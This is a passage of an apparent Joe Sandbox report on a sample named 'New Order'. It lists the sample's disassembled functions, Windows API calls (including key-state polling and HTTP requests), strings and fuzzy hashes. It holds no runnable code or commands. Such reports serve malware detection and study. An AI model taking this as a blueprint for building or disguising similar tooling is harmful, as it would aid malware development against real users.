VariantClear.OLEAUT32(?), ref: 00343936

Strings

Failed to create object, xrefs: 003437E4, 0034389A
NULL Pointer assignment, xrefs: 0034381E
Invalid parameter, xrefs: 00343865

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 2d547192ea3ad9e55a3899ce3e48245e00ad17410c358cc695d9de9c5ca07573
Instruction ID: 913d20b0d474453ca4e2a579a4d31f311860dd347bf78e733b5f3e1cec547914
Opcode Fuzzy Hash: 2d547192ea3ad9e55a3899ce3e48245e00ad17410c358cc695d9de9c5ca07573
Instruction Fuzzy Hash: 53619DB1608311AFD312DF54C889F6ABBE8EF49715F100919F9959B2A1C770FE48CB92

Function 00358B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 002D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 002D9BB2

Part of subcall function 002D912D: GetCursorPos.USER32(?), ref: 002D9141
Part of subcall function 002D912D: ScreenToClient.USER32(00000000,?), ref: 002D915E
Part of subcall function 002D912D: GetAsyncKeyState.USER32(00000001), ref: 002D9183
Part of subcall function 002D912D: GetAsyncKeyState.USER32(00000002), ref: 002D919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00358B6B
ImageList_EndDrag.COMCTL32 ref: 00358B71
ReleaseCapture.USER32 ref: 00358B77
SetWindowTextW.USER32(?,00000000), ref: 00358C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00358C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00358CFF

Strings

@GUI_DROPID, xrefs: 00358C51
@GUI_DRAGFILE, xrefs: 00358C9A
p#9, xrefs: 00358C71

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$p#9
API String ID: 1924731296-595764261
Opcode ID: d4c1628e509491a91abad029af0a0e624525ab50aa0081cd31936629f6d00644
Instruction ID: c1ca9ac1f203d5e89ca239714b94b67eafbdea24fcf54b772dd747e4d45b32ec
Opcode Fuzzy Hash: d4c1628e509491a91abad029af0a0e624525ab50aa0081cd31936629f6d00644
Instruction Fuzzy Hash: 6351AD70114304AFD706EF24CC5AFAA77E8FB88715F000A2EF956672E1CB719958CB62

Function 00333388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 003333CF

Part of subcall function 002C9CB3: _wcslen.LIBCMT ref: 002C9CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 003333F0

Strings

^ ERROR , xrefs: 0033349E
Line %d (File "%s"):, xrefs: 00333443, 0033345C
Incorrect parameters to object property !, xrefs: 003334AB
Error: , xrefs: 003334D1
"%s" (%d) : ==> %s:, xrefs: 00333522
"%s" (%d) : ==> %s:%s%s, xrefs: 00333504

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 083011d69e85f9646f22abdae5bb08be6fbbc2ab5ea2d5d530e533339add6e4c
Instruction ID: f205eadf6163205d5cb0332746a4de6cedeec3999c16c16a388f7821f280bd06
Opcode Fuzzy Hash: 083011d69e85f9646f22abdae5bb08be6fbbc2ab5ea2d5d530e533339add6e4c
Instruction Fuzzy Hash: DC519471910609AADF16EBA0DD86FEEB778AF04344F10826AF50573052DB356FA8CF61

Function 0032B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0032B5FC
_wcslen.LIBCMT ref: 0032B608
_wcslen.LIBCMT ref: 0032B64D
_wcslen.LIBCMT ref: 0032B68C
_wcslen.LIBCMT ref: 0032B6C7

Strings

APPEND, xrefs: 0032B6C1, 0032B6C6
KEYS, xrefs: 0032B647, 0032B64C
REMOVE, xrefs: 0032B602, 0032B607
EXISTS, xrefs: 0032B686, 0032B68B

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 8c8776dabd4881d3ca048dee69a712098a93809f704e35b7eb24ce0a0bedf272
Instruction ID: e3d62b24b257ce801eee4010c32a1f444379cb35e704821fcdf3ade9280feca7
Opcode Fuzzy Hash: 8c8776dabd4881d3ca048dee69a712098a93809f704e35b7eb24ce0a0bedf272
Instruction Fuzzy Hash: 7741C632A001379BCB216F7DD8915BEF7A5BFA0B54B264229E462DB284E731CD81C790

Function 00335393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 003353A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00335416
GetLastError.KERNEL32 ref: 00335420
SetErrorMode.KERNEL32(00000000,READY), ref: 003354A7

Strings

READY, xrefs: 00335460, 00335468
INVALID, xrefs: 00335459
UNKNOWN, xrefs: 00335444
NOTREADY, xrefs: 0033544B
READONLY, xrefs: 00335452

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: d16c76d479d6df187b71090a10795005177c63fd4c99dfdd021d3341625dfc7c
Instruction ID: 8b59a7f2904b518d2372ec633fcc8151ecc65eb852bb116868230d1a61d45392
Opcode Fuzzy Hash: d16c76d479d6df187b71090a10795005177c63fd4c99dfdd021d3341625dfc7c
Instruction Fuzzy Hash: 3D31A335A006049FC716DF69C8C5FAABBB8EF45305F158069E805CB2A2DB71DD86CB90

Function 00353C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00353C79
SetMenu.USER32(?,00000000), ref: 00353C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00353D10
IsMenu.USER32(?), ref: 00353D24
CreatePopupMenu.USER32 ref: 00353D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00353D5B
DrawMenuBar.USER32 ref: 00353D63

Strings

0, xrefs: 00353C54
F, xrefs: 00353D4E

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 3211ecb4d7386e3089072b909cf1884f6210e6441d13c950e223847d1b8db645
Instruction ID: b25c72a7c1a163db6cf304a773a2cc1428b97bbbeff773c0072bce83b37115f3
Opcode Fuzzy Hash: 3211ecb4d7386e3089072b909cf1884f6210e6441d13c950e223847d1b8db645
Instruction Fuzzy Hash: 19416675A01309AFDB16CFA4D844FAABBB9FF49385F140429ED06A7360D730AA14CF90

Function 00353A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00353A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00353AA0
GetWindowLongW.USER32(?,000000F0), ref: 00353AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00353AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00353B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00353BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00353BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00353BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00353BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00353C13

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 3bf08deee0499e7d0bb4aaaefc8b84ad8dc61e1bc4108bed112f7fccf7c2ef1c
Instruction ID: e9b4027ebe9a886833343368824529c6aa1982c398c5606a7c7157142d6fc2c0
Opcode Fuzzy Hash: 3bf08deee0499e7d0bb4aaaefc8b84ad8dc61e1bc4108bed112f7fccf7c2ef1c
Instruction Fuzzy Hash: 84616D75900248AFDB12DFA8CC81EEE77F8EB09744F10419AFA15E72A1D770AE45DB50

Function 0032B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0032B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0032A1E1,?,00000001), ref: 0032B165
GetWindowThreadProcessId.USER32(00000000), ref: 0032B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0032A1E1,?,00000001), ref: 0032B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0032B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0032A1E1,?,00000001), ref: 0032B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0032A1E1,?,00000001), ref: 0032B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0032A1E1,?,00000001), ref: 0032B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0032A1E1,?,00000001), ref: 0032B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0032A1E1,?,00000001), ref: 0032B21D

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: d759c4c4b0ae964489dd7d8b3e2aa5322d2c83f950343ab1e0c919e736d7d2c2
Instruction ID: 7dc0d7cbd4565598937e1638ec87fe845e32ab59d4a2d0fdb516fc5f0cdd1dad
Opcode Fuzzy Hash: d759c4c4b0ae964489dd7d8b3e2aa5322d2c83f950343ab1e0c919e736d7d2c2
Instruction Fuzzy Hash: B331A9B1520314EFDB139F24EC48BAEBBADBB50716F154406FA02D62A0D7B4AA40CF60

Function 002F2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 002F2C94

Part of subcall function 002F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,002FD7D1,00000000,00000000,00000000,00000000,?,002FD7F8,00000000,00000007,00000000,?,002FDBF5,00000000), ref: 002F29DE
Part of subcall function 002F29C8: GetLastError.KERNEL32(00000000,?,002FD7D1,00000000,00000000,00000000,00000000,?,002FD7F8,00000000,00000007,00000000,?,002FDBF5,00000000,00000000), ref: 002F29F0

_free.LIBCMT ref: 002F2CA0
_free.LIBCMT ref: 002F2CAB
_free.LIBCMT ref: 002F2CB6
_free.LIBCMT ref: 002F2CC1
_free.LIBCMT ref: 002F2CCC
_free.LIBCMT ref: 002F2CD7
_free.LIBCMT ref: 002F2CE2
_free.LIBCMT ref: 002F2CED
_free.LIBCMT ref: 002F2CFB

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: af62930dd874392e97335c4d88303109939a6420eacc2aa0f0fc05f1577a08ca
Instruction ID: 55a7e2871fd2bf2f27bb1767b240f940ed5c4a63dde410e9fd2de7de8131b9a9
Opcode Fuzzy Hash: af62930dd874392e97335c4d88303109939a6420eacc2aa0f0fc05f1577a08ca
Instruction Fuzzy Hash: A511C67616010DEFCB02EF54D842CEDBBA5FF06390F5154A1FA485B222D671EA649F90

Function 002C1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 002C1459
OleUninitialize.OLE32(?,00000000), ref: 002C14F8
UnregisterHotKey.USER32(?), ref: 002C16DD
DestroyWindow.USER32(?), ref: 003024B9
FreeLibrary.KERNEL32(?), ref: 0030251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0030254B

Strings

close all, xrefs: 002C1454

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 05b0eaea657266a790016c08a20aef79d12f59f5011f9363459eff95f1d741a5
Instruction ID: 80158d4c48c6755d9bbf003806c06bcca357be906e89290d4724fa0a562e6695
Opcode Fuzzy Hash: 05b0eaea657266a790016c08a20aef79d12f59f5011f9363459eff95f1d741a5
Instruction Fuzzy Hash: 4BD150317222128FCB1ADF15C8A9F29F7A4BF06700F15429DE44A6B2A2DB319D36CF54

Function 002C5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 002C5C7A

Part of subcall function 002C5D0A: GetClientRect.USER32(?,?), ref: 002C5D30
Part of subcall function 002C5D0A: GetWindowRect.USER32(?,?), ref: 002C5D71
Part of subcall function 002C5D0A: ScreenToClient.USER32(?,?), ref: 002C5D99

GetDC.USER32 ref: 003046F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00304708
SelectObject.GDI32(00000000,00000000), ref: 00304716
SelectObject.GDI32(00000000,00000000), ref: 0030472B
ReleaseDC.USER32(?,00000000), ref: 00304733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003047C4

Strings

U, xrefs: 00304693

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 5b6ef8344106825a207806d3eec5dbc03acb28764468111316ef389e36bd7ae6
Instruction ID: 4758d1e5e2f493a0d004e17fa3a052812be7186e08b44dc77f9010221ff779c7
Opcode Fuzzy Hash: 5b6ef8344106825a207806d3eec5dbc03acb28764468111316ef389e36bd7ae6
Instruction Fuzzy Hash: FC71FF70401209DFCF238F64C994EBA3BB5FF4A314F14426AEE655A2A6D331DA91DF50

Function 0033359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 003335E4

Part of subcall function 002C9CB3: _wcslen.LIBCMT ref: 002C9CBD

LoadStringW.USER32(00392390,?,00000FFF,?), ref: 0033360A

Strings

^ ERROR, xrefs: 003336C9
Line %d (File "%s"):, xrefs: 0033366B
Error: , xrefs: 003336EF
"%s" (%d) : ==> %s:, xrefs: 00333742
"%s" (%d) : ==> %s:%s%s, xrefs: 00333724

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 1558d54e31144bd2b176e535bce5b7284e49a06ba8e9ac77cf3941c91895daed
Instruction ID: 197760899346628ca10a3c69d58947b21aa80267debbae61e3a780124ce59ac8
Opcode Fuzzy Hash: 1558d54e31144bd2b176e535bce5b7284e49a06ba8e9ac77cf3941c91895daed
Instruction Fuzzy Hash: 7451607191025ABADF16EBA0DC86FEDBB78AF04340F144269F505721A1DB311BA9DFA0

Function 0033C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0033C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0033C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0033C2CA
GetLastError.KERNEL32 ref: 0033C322
SetEvent.KERNEL32(?), ref: 0033C336
InternetCloseHandle.WININET(00000000), ref: 0033C341

Strings

, xrefs: 0033C2BB

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 05c2c539a1984546a1d9ad8f6239ff44dea2e982ed5d169058bed9f78a29ed42
Instruction ID: 67013e8d075428aacc5e998ad10525f5bf1c5dbd685c9a5aee54bca49701bfa8
Opcode Fuzzy Hash: 05c2c539a1984546a1d9ad8f6239ff44dea2e982ed5d169058bed9f78a29ed42
Instruction Fuzzy Hash: 2F31ABB5620308AFDB229F648CC8AAB7BFCEB09754F04951EF446E6210DB38DD048B60

Function 0032989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00303AAF,?,?,Bad directive syntax error,0035CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 003298BC
LoadStringW.USER32(00000000,?,00303AAF,?), ref: 003298C3

Part of subcall function 002C9CB3: _wcslen.LIBCMT ref: 002C9CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00329987

Strings

Line %d:, xrefs: 00329912
%s (%d) : ==> %s.: %s %s, xrefs: 003298F1
Line %d (File "%s"):, xrefs: 0032992D
Error: , xrefs: 00329955
., xrefs: 0032996D

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: faef6e88661446b7512876b3462e1e40e0291ebb8507996515e1928bd31710a3
Instruction ID: 5a661827297e9a81d96fa3f764e00756b6d7889bc3edf42fbe7a6be0306d8e97
Opcode Fuzzy Hash: faef6e88661446b7512876b3462e1e40e0291ebb8507996515e1928bd31710a3
Instruction Fuzzy Hash: A2217C3191031AABCF12EF90DC0AFEE7739BF18304F04456AF515660A2EB719AA8CF50

Function 0032209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 003220AB
GetClassNameW.USER32(00000000,?,00000100), ref: 003220C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0032214D

Strings

largeicons, xrefs: 003220E1
SHELLDLL_DefView, xrefs: 003220CC
list, xrefs: 0032212F
smallicons, xrefs: 00322115
details, xrefs: 003220FB

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: ffea7e7960ed669371f76030e79f238f790589a063d6961f743fee9295b33955
Instruction ID: 7ede5e6b7f00bd69cbb46c34baadfc1204969dd27c762914565161bffd63d1a3
Opcode Fuzzy Hash: ffea7e7960ed669371f76030e79f238f790589a063d6961f743fee9295b33955
Instruction Fuzzy Hash: 3311367A6D8326B9FA033620EC06CE7379CDF14324F200066FB04A41E1FE6178215A18

Function 002FCE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 002FCEB7
_free.LIBCMT ref: 002FCF22
_free.LIBCMT ref: 002FCF48
